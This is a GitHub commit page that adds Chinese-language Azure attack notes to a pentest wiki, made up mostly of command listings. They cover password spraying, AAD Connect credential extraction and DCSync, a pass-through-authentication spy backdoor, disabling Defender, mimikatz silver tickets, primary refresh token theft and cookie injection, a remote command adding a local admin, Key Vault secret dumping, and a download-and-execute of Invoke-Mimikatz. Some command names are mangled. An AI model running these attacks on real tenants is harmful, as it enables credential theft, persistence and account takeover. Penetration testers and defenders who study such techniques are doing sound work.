Skip to content

Commit e7b8f28

Browse files
committed
update cloud hacking
1 parent fa58b77 commit e7b8f28

26 files changed

+763
-2
lines changed

wiki/README.md

+22
Original file line numberDiff line numberDiff line change
@@ -584,6 +584,28 @@
584584
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限提升.md)
585585
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限维持.md)
586586
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/枚举.md)
587+
- [Azure](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/README.md)
588+
- [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
589+
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
590+
- [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
591+
- [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
592+
- [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
593+
- [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
594+
- [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
595+
- [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
596+
- [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
597+
- [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
598+
- [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
599+
- [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
600+
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
601+
- [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
602+
- [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
603+
- [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
604+
- [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
605+
- [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
606+
- [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
607+
- [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
608+
- [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)
587609
- [Aliyun](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/README.md)
588610
- [osskey](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/osskey.md)
589611
- [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/工具.md)

wiki/云安全/AWS/README.md

+1
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,4 @@
1+
translate from https://github.com/swisskyrepo/PayloadsAllTheThings
12
- [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/初始访问.md)
23
- [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限提升.md)
34
- [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限维持.md)
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
Administrative Unit可以重置其他用户密码
2+
3+
PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
4+
PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
5+
PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
6+
PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
7+
PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl
8+
PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
9+
PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose

wiki/云安全/Azure/AzureAD.md

+26
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
对于 Microsoft,如果您将任何云服务(Office 365、Exchange Online 等)与 Active Directory(本地或在 Azure 中)一起使用,那么攻击者只需一个凭证就可以通过 Azure AD泄露您的整个 Active Directory 结构
2+
验证您的网络邮件门户(即https://webmail.domain.com/)
3+
将浏览器 URL 更改为:https ://azure.microsoft.com/
4+
从活动会话中选择帐户
5+
选择 Azure Active Directory
6+
| Active Directory | Azure AD |
7+
|---|---|
8+
| LDAP | REST API'S |
9+
| NTLM/Kerberos | OAuth/SAML/OpenID |
10+
| Structured directory (OU tree) | Flat structure |
11+
| GPO | No GPO's |
12+
| Super fine-tuned access controls | Predefined roles |
13+
| Domain/forest | Tenant |
14+
| Trusts | Guests |
15+
16+
密码喷射
17+
>git clone https://github.com/dafthack/MSOLSpray
18+
>Import-Module .\MSOLSpray.ps1
19+
>Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
20+
>Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
21+
将 GUID 转换为 SID
22+
通过连接"S-1–12–1-"到 AAD Id 的每个部分的十进制表示,将用户的 AAD id 转换为 SID。
23+
24+
GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
25+
SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
26+
例如,表示6aa89ecb-1f8f-4d92–810d-b0dce30b6c82是S-1–12–1–1789435595–1301421967–3702525313–2188119011

wiki/云安全/Azure/AzureAD连接.md

+59
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
#### 检查是否安装了 Azure AD Connect:Get-ADSyncConnector
2+
3+
对于PHS,我们可以提取凭证
4+
对于PTA,我们可以安装代理
5+
对于联合身份,我们可以使用 DA 从 ADFS 服务器提取证书
6+
PS > Set-MpPreference -DisableRealtimeMonitoring $true
7+
PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents
8+
PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals
9+
PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
10+
PS > Get-AADIntSyncCredentials
11+
12+
获取 SYNC 帐户的令牌并重置本地管理员密码
13+
PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
14+
PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
15+
PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
16+
PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
17+
PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
18+
19+
#### 检查是否安装了 PTA:Get-Command -Module PassthroughAuthPSModule
20+
安装 PTA 后门
21+
PS AADInternals> Install-AADIntPTASpy
22+
PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
23+
24+
#### Azure AD Connect - 密码提取
25+
AD Sync 中的凭据:C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
26+
工具 | 需要在目标上执行代码 | DLL 依赖项 | 本地需要 MSSQL | 本地需要python
27+
--- | --- | --- | --- | ---
28+
ADSyncDecrypt | 是 | 是 | 否 | 否
29+
ADSyncGather | 是 | 否 | 否 | 是
30+
ADSyncQuery | 否 (仅限网络 RPC 调用) | 否 | 是 | 是
31+
32+
git clone https://github.com/fox-it/adconnectdump
33+
#### Azure AD Connect - MSOL 帐户的密码和 DCSync
34+
可以使用 MSOL 帐户执行DCSync攻击
35+
要求:
36+
使用 Azure AD Connect 服务破坏服务器
37+
访问 ADSyncAdmins 或本地管理员组
38+
使用azuread_decrypt_msol.ps1来恢复 MSOL 帐户的解密密码:
39+
azuread_decrypt_msol.ps1: AD Connect 同步凭证提取 POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
40+
azuread_decrypt_msol_v2.ps1:更新了转储 Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c使用的 MSOL 服务帐户(允许 DCSync)的方法
41+
现在可以使用检索到的 MSOL 帐户凭据来发起 DCSync 攻击。
42+
#### Azure AD Connect - 银票上的无缝单点登录
43+
任何可以编辑 AZUREADSSOACCS$ 帐户属性的人都可以使用 Kerberos 模拟 Azure AD 中的任何用户(如果没有 MFA)
44+
PHS 和 PTA 都支持无缝 SSO。如果启用无缝 SSO,则会在本地 AD 中创建计算机帐户AZUREADSSOC。
45+
AZUREADSSOACC 帐户的密码永远不会更改。
46+
使用https://autologon.microsoftazuread-sso.com/将 Kerberos 票证转换为 Office 365 和 Azure 的 SAML 和 JWT
47+
48+
AZUREADSSOACC 帐户的 NTLM 密码哈希,例如f9969e088b2c13d93833d0ce436c76dd.
49+
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
50+
我们要模拟的用户的 AAD 登录名,例如elrond@contoso.com. 这通常是他的 userPrincipalName 或来自本地 AD 的邮件属性。
51+
我们要模拟的用户的 SID,例如S-1-5-21-2121516926-2695913149-3163778339-1234.
52+
创建 Silver Ticket 并将其注入 Kerberos 缓存:
53+
mimikatz.exe "kerberos::golden /user:elrond
54+
/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
55+
/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
56+
/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
57+
启动 Mozilla Firefox
58+
转到 about:config 并将network.negotiate-auth.trusted-uris preference值设置为https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com
59+
导航到与我们的 AAD 域集成的任何 Web 应用程序。填写用户名,同时将密码字段留空。
+12
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,12 @@
1+
枚举 blob
2+
PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
3+
PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
4+
Found Storage Account - testsecure.blob.core.windows.net
5+
Found Storage Account - securetest.blob.core.windows.net
6+
Found Storage Account - securedata.blob.core.windows.net
7+
Found Storage Account - securefiles.blob.core.windows.net
8+
列出和下载 blob
9+
PS Az> Get-AzResource
10+
PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
11+
PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
12+
PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob

wiki/云安全/Azure/Intunes管理.md

+9
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
要求:
2+
全局管理员或Intune管理员特权:Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
3+
4+
登录https://endpoint.microsoft.com/#home或使用 Pass-The-PRT
5+
转到设备->所有设备以检查注册到 Intune 的设备
6+
转到脚本并单击添加Windows 10。
7+
添加Powershell 脚本
8+
在分配页面中指定添加所有用户和添加所有设备。
9+
执行脚本最多需要一小时

wiki/云安全/Azure/KeyVault.md

+13
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
keyvault 访问令牌
2+
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
3+
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
4+
5+
连接
6+
PS> $token = 'eyJ0..'
7+
PS> $keyvaulttoken = 'eyJ0..'
8+
PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
9+
10+
查询vault和密钥
11+
PS Az> Get-AzKeyVault
12+
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
13+
PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose
2+
Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert
3+
4+
需要 PRT、TenantID、Context 和 DerivedKey
5+
& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME>.onmicrosoft.com --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
6+
PFX 使用名称 <Username>@<TENANT NAME>.onmicrosoft.com.pfx 和密码 AzureADCert 保存
7+
Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine
8+
9+
https://github.com/morRubin/AzureADJoinedMachinePTC
10+
11+
Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
12+
Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10
13+
14+
python Main.py --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME>.onmicrosoft.com.pfx --
15+
certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"

wiki/云安全/Azure/Pass-The-PRT.md

+28
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
MimiKatz(2.2.0 及更高版本)可用于通过用于 Azure AD SSO(单点登录)的主刷新令牌 (PRT) 来攻击(混合)加入 Azure AD 的机器进行横向移动攻击。
2+
3+
运行 mimikatz 获取 PRT
4+
PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
5+
PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
6+
7+
复制 PRT 和 KeyValue
8+
Mimikatz> privilege::debug
9+
Mimikatz> token::elevate
10+
Mimikatz> dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect
11+
12+
复制 Context、ClearKey 和 DerivedKey
13+
Mimikatz> dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>
14+
生成 JWT
15+
PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
16+
PS AADInternals> $PRT_OF_USER = '...'
17+
PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
18+
PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
19+
PS AADInternals> $ClearKey = "XXYYZZ..."
20+
PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
21+
PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce
22+
eyJ0eXAiOiJKV1QiL...
23+
( JSON Web 令牌)可以在https://login.microsoftonline.com/login.srf<Signed JWT>的(匿名)浏览器会话中用作 PRT cookie 。 使用以下值编辑 Chrome cookie (F12) -> 应用程序 -> Cookies:
24+
25+
Name: x-ms-RefreshTokenCredential
26+
Value: <Signed JWT>
27+
HttpOnly: √
28+
️用标志HTTPOnly和标记 cookie Secure。

wiki/云安全/Azure/README.md

+22
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
translate from https://github.com/swisskyrepo/PayloadsAllTheThings
2+
- [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
3+
- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
4+
- [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
5+
- [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
6+
- [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
7+
- [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
8+
- [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
9+
- [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
10+
- [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
11+
- [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
12+
- [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
13+
- [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
14+
- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
15+
- [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
16+
- [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
17+
- [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
18+
- [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
19+
- [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
20+
- [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
21+
- [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
22+
- [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
>az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>

0 commit comments

Comments
 (0)